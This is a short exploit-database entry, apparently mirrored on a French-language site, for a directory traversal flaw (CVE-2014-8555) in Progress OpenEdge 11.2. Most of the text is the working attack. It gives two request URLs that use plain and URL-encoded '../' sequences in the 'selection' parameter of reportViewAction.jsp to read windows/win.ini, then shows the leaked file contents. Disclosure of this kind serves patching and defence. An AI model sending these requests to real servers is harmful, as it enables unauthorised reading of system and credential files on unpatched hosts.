Skip to content
cyberexploits
webappjsptext

Progress OpenEdge 11.2 - Directory Traversal

Progress OpenEdge 11.2 - Directory Traversal

Publié le 2014-10-31

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/jsp/webapps/35127.txt7eac4c3a
raw
# Exploit Title: Progress OpenEdge Directory Traversal

# Date: 30/10/2014

# Exploit Author: Mauricio Correa

# Vendor Homepage: www.progress.com

# Software Link: www.progress.com/products/openedge

# Version: 11.2

# Tested on: Windows OS

# CVE : CVE-2014-8555



 



The malicious user sends a malformed request that generates the file access

up directories as follows: 



 



http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.

.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 



 



or else 



 



http://

target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..

/../../windows/win.ini 



 



 



And the application answers



 



; for 16-bit app support



[fonts]



[extensions]



[mci extensions]



[files]



[Mail]



MAPI=1



CMCDLLNAME32=mapi32.dll



CMC=1



MAPIX=1



MAPIXVER=1.0.0.1



OLEMessaging=1



 



 



More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256



 



Thanks



Voir sur GitHub